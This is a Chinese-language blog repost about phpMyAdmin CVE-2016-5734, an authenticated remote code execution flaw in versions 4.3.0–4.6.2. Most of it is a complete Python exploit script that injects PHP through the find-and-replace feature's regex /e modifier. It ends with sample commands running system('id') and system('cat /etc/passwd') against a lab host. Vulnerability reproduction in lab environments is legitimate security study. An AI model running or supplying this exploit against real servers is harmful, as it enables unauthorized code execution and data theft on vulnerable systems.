综合开发

phpmyadmin远程代码执行漏洞(CVE-2016-5734)

微信扫一扫,分享到朋友圈

phpmyadmin远程代码执行漏洞(CVE-2016-5734)

简介

环境复现:https://github.com/vulhub/vulhub

线上平台:榆林学院内可使用协会内部的网络安全实验平台

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。

影响版本

phpmyadmin4.3.0-4.6.2

代码审计

待更新….

漏洞利用

漏洞利用py

#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system(‘ls -lua‘);""""
importrequestsimportargparseimportsys__author__ = "@iamsecurity"
if __name__ == ‘__main__‘:
parser=argparse.ArgumentParser()
parser.add_argument("url", type=str, help="URL with path to PMA")
parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
arguments=parser.parse_args()
url_to_pma=arguments.url
uname=arguments.user
upass=arguments.pwdifarguments.dbs:
db=arguments.dbselse:
db= "test"token=False
custom_table=Falseifarguments.table:
custom_table=True
table=arguments.tableelse:
table= "prgpwn"
ifarguments.cmd:
payload=arguments.cmdelse:
payload= "system(‘uname -a‘);"size= 32s=requests.Session()#you can manually add proxy support it‘s very simple ;)
#s.proxies = {‘http‘: "127.0.0.1:8080", ‘https‘: "127.0.0.1:8080"}
s.verify =False
sql= ‘‘‘CREATE TABLE `{0}` (
`first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX(‘302F6500‘));‘‘‘.format(table)#get_token
resp = s.post(url_to_pma + "/?lang=en", dict(
pma_username=uname,
pma_password=upass
))if resp.status_code is 200:
token_place= resp.text.find("token=") + 6token= resp.text[token_place:token_place + 32]if token isFalse:print("Cannot get valid authorization token.")
sys.exit(1)if custom_table isFalse:
data={"is_js_confirmed": "0","db": db,"token": token,"pos": "0","sql_query": sql,"sql_delimiter": ";","show_query": "0","fk_checks": "0","SQL": "Go","ajax_request": "true","ajax_page_request": "true",
}
resp= s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))if resp.status_code == 200:if "success" inresp.json():if resp.json()["success"] isFalse:
first= resp.json()["error"][resp.json()["error"].find("<code>")+6:]
error= first[:first.find("</code>")]if "already exists" inerror:print(error)else:print("ERROR:" +error)
sys.exit(1)#build exploit
exploit ={"db": db,"table": table,"token": token,"goto": "sql.php","find": "0/e","replaceWith": payload,"columnIndex": "0","useRegex": "on","submit": "Go","ajax_request": "true"}
resp=s.post(
url_to_pma+ "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
)if resp.status_code == 200:
result= resp.json()["message"][resp.json()["message"].find("</a>")+8:]iflen(result):print("result:" +result)
sys.exit(0)print("Exploit failed!n"
"Try to manually set exploit parameters like --table, --database and --token.n"
"Remember that servers with PHP version greater than 5.4.6"
"is not exploitable, because of warning about null byte in regexp")
sys.exit(1)

View Code

python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system(‘id‘)"

python PhpMyAdmin_RCE.py -u root -p "root" http://192.168.52.129:8080 -c "system(‘cat /etc/passwd‘)"

技术图片

phpmyadmin远程代码执行漏洞(CVE-2016-5734)

原文地址:https://www.cnblogs.com/xhds/p/12579289.html

美国科技五巨头强势,美股大跌期间也比大盘跌得少

上一篇

佳能考虑进入OLED材料市场 三星也得看佳能脸色?

下一篇

你也可能喜欢

评论已经被关闭。

插入图片

热门栏目

phpmyadmin远程代码执行漏洞(CVE-2016-5734)

长按储存图像,分享给朋友